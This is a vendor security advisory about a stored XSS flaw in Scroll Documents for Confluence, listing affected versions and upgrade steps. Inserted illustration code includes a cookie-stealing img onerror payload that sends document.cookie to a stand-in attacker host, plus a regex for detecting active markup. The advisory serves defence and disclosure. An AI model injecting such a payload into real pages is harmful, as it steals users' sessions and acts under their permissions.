XSS Vulnerability in Scroll Documents - Security Advisory 2019-10-23

Description

Summary

This advisory discloses a security issue of *high* severity affecting Scroll Documents and provides a step-by-step guide to help you rectify it. The following apps and versions are affected:

  • Scroll Documents for Confluence Server, versions 1.1.5 and older

  • Scroll Documents for Confluence Cloud, versions 2.0.6-AC and older

After updating to the fix versions, your instance is no longer affected by this security issue.

Severity

K15t Software rates the severity level of this issue as *high*.

This is our baseline assessment - it's best if you evaluate its applicability to your own IT environment.

Detailed description

Scroll Documents is affected by a stored XSS vulnerability: someone who can edit a document can place malicious markup or script into it, and that code is executed in the browser of every user who later views the document. Among other things, this can be used to:

  • Execute HTTP requests against Confluence on behalf of the viewing user, with that user's session and permissions
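To make the mechanism concrete, here is an added illustration of the stored XSS class the advisory describes. It is not Scroll Documents code and not K15t's fix: the document title, the two rendering functions, the attacker URL and the review check are constructed placeholders that show a user-supplied field rendered unescaped versus entity-encoded.

```javascript
// Added illustration of stored XSS; NOT Scroll Documents code.
// Assumption: some stored document field (here a title) is later placed
// into page markup for another user to view.

// Constructed attacker-controlled value. If rendered as raw HTML, the browser
// parses the <img> tag and the onerror handler issues a request carrying the
// viewer's cookies (the "HTTP requests on behalf of a user" impact). The
// attacker URL is a placeholder.
const ATTACKER_TITLE =
  '<img src=x onerror="fetch(\'https://attacker.example/c?\' + document.cookie)">';

// Vulnerable pattern: stored text is interpolated into HTML unescaped.
function renderTitleUnsafe(title) {
  return `<h1 class="doc-title">${title}</h1>`;
}

// Minimal HTML entity encoder for text placed in an element body.
// (Attribute values, URLs and inline JavaScript need context-specific rules.)
function escapeHtml(text) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(text).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Hardened pattern: every stored string is entity-encoded before it is placed
// in markup, so the payload is displayed as literal text and never parsed.
function renderTitleSafe(title) {
  return `<h1 class="doc-title">${escapeHtml(title)}</h1>`;
}

// Rough review check for rendered output: does the fragment still contain
// a tag with an inline event handler, or a <script> element?
function containsActiveMarkup(html) {
  return /<\s*\w+[^>]*\bon\w+\s*=|<\s*script\b/i.test(html);
}
```

Feeding ATTACKER_TITLE through renderTitleUnsafe yields markup that containsActiveMarkup flags, while renderTitleSafe produces a fragment in which the payload survives only as `&lt;img ...` text.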

Steps we've taken to fix this issue

We have taken the following steps to address this issue:

  • Released the *Scroll Documents 1.2.0 (Server)* and *2.0.7-AC (Cloud)* updates on the Atlassian Marketplace

  • Informed all app customers and evaluators through our release notes.

What you need to do to solve this issue on your instance

A Confluence administrator needs to upgrade Scroll Documents to these (or later) versions:

  • Scroll Documents for Confluence Cloud, version 2.0.7-AC or newer

  • Scroll Documents for Confluence Server, version 1.2.0 or newer

Scroll Documents for Confluence Cloud is usually updated automatically in your Confluence Cloud instance by the Atlassian Marketplace. Hence, you only need to double-check that the version shown in the Manage Apps/Add-ons section is 2.0.7-AC or newer. If it is not, trigger the update manually by clicking Update in the Manage Apps/Add-ons section of your Confluence Cloud instance.

Scroll Documents for Confluence Server needs to be updated within the Manage Apps/Add-ons section of your Confluence Server instance, either by clicking Update for Scroll Documents or by downloading the latest version from the Atlassian Marketplace and uploading it manually.
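For administrators checking several instances, here is an added helper (not K15t's tooling) that decides from the version string shown in Manage Apps/Add-ons whether an installation is still affected. It assumes Server versions look like "1.1.5" and Cloud versions like "2.0.6-AC", with the "-AC" suffix carrying no ordering information; the sample inventory and hostnames are constructed.

```javascript
// Added version check for this advisory; not part of Scroll Documents.

// Fix versions from the advisory; anything older is affected.
const FIX_VERSIONS = {
  server: '1.2.0',
  cloud: '2.0.7-AC',
};

// Parse "1.1.5" or "2.0.6-AC" into numeric components. A trailing qualifier
// such as "-AC" is dropped (assumption: it marks the Cloud build, not order).
function parseVersion(version) {
  const core = String(version).trim().split('-')[0];
  const parts = core.split('.').map((p) => Number.parseInt(p, 10));
  if (parts.length === 0 || parts.some((n) => Number.isNaN(n))) {
    throw new Error(`unparseable version string: ${version}`);
  }
  return parts;
}

// Component-wise numeric comparison (so 1.10.0 > 1.2.0, unlike a string
// compare); missing components count as 0, so "1.2" equals "1.2.0".
function compareVersions(a, b) {
  const pa = parseVersion(a);
  const pb = parseVersion(b);
  const len = Math.max(pa.length, pb.length);
  for (let i = 0; i < len; i++) {
    const x = i < pa.length ? pa[i] : 0;
    const y = i < pb.length ? pb[i] : 0;
    if (x !== y) return x < y ? -1 : 1;
  }
  return 0;
}

// deployment is 'server' or 'cloud'. Returns true when an upgrade is required.
function isAffected(deployment, installedVersion) {
  const fix = FIX_VERSIONS[deployment];
  if (!fix) throw new Error(`unknown deployment: ${deployment}`);
  return compareVersions(installedVersion, fix) < 0;
}

// Constructed sample inventory: what an admin might read off two instances.
const SAMPLE_INVENTORY = [
  { host: 'wiki.example.internal', deployment: 'server', version: '1.1.5' },
  { host: 'example.atlassian.net', deployment: 'cloud', version: '2.0.7-AC' },
];

// One row per instance: whether it is affected and which version fixes it.
function report(inventory = SAMPLE_INVENTORY) {
  return inventory.map((item) => ({
    host: item.host,
    affected: isAffected(item.deployment, item.version),
    requiredFix: FIX_VERSIONS[item.deployment],
  }));
}
```

Running report() on the sample inventory marks the Server instance on 1.1.5 as affected and the Cloud instance on 2.0.7-AC as clean; replace SAMPLE_INVENTORY with the versions read from your own instances.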

We are here to support you

We apologize deeply for any inconvenience this issue has caused you. If you would like assistance in correcting it, then we are here to help.

If you have any questions or want support in fixing the issue on your system, please let us know at support@k15t.com. We are happy to schedule a 1:1 screen-sharing session to help you resolve the issue.


Reporter

Candid Dauth (K15t)

Deployment

Cloud
Server

Due date

2019/10/23

Priority

Major